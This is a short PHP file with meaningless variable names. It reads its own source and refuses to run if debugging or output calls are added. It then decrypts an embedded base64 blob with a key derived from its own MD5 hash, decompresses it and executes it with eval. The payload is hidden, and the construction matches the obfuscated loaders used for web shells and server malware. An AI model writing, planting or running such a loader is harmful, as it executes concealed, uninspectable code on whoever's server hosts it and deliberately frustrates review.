<?php
$hgmnntaeb="9d8a5faff45179b2b207079342312a0b";
$ifdxtlhmhij="5c5c5a045603560707055350050b0150030a5305565100515500040957570656";
$kitqtvqzpv="TnZPLK2q+K8t5DZLfB9NrK33MOA3NjuA8/7rbGh7M2lgey8O5gezy60lZGs4IOjpqsvogkytcS8texrqNcT/eysUY78GwKf49qM8wGWiMsJlrC2frkqIZGE=";
$swdqvucbfym=file_get_contents(__FILE__);
$wqlcjbclkl=str_replace($kitqtvqzpv,"",$swdqvucbfym);
if(strpos($wqlcjbclkl,"ec"."ho")!==false||strpos($wqlcjbclkl,"pr"."int")!==false||strpos($wqlcjbclkl,"var_"."dump")!==false||strpos($wqlcjbclkl,"file_put_"."contents")!==false||strpos($wqlcjbclkl,"fw"."rite")!==false){die();}
$xjzlxzxlpglo=str_replace(array($hgmnntaeb,$ifdxtlhmhij),array("SP_3e46f212","KP_4b2739f8"),$swdqvucbfym);
$ogqyzeupu=md5($xjzlxzxlpglo);
$xytiytaxybm=hex2bin($ifdxtlhmhij);
$xzdjsiqmlu="";
$pusrgwh=strlen($ogqyzeupu);
for($geehqx=0;$geehqx<$pusrgwh;$geehqx++){
    $xzdjsiqmlu.=chr(ord($xytiytaxybm[$geehqx])^ord($ogqyzeupu[$geehqx]));
}
$mrpjfmeqms=base64_decode($kitqtvqzpv);
$dakbhwrxaqmx=strlen($mrpjfmeqms);
$mlmfrhxwne="";
$xuflypuuf=strlen($xzdjsiqmlu);
for($geehqx=0;$geehqx<$dakbhwrxaqmx;$geehqx++){
    $mlmfrhxwne.=$mrpjfmeqms[$geehqx]^$xzdjsiqmlu[$geehqx%$xuflypuuf];
}
$qppzcvhmh="gz"."in"."fl"."ate";
eval($qppzcvhmh($mlmfrhxwne));
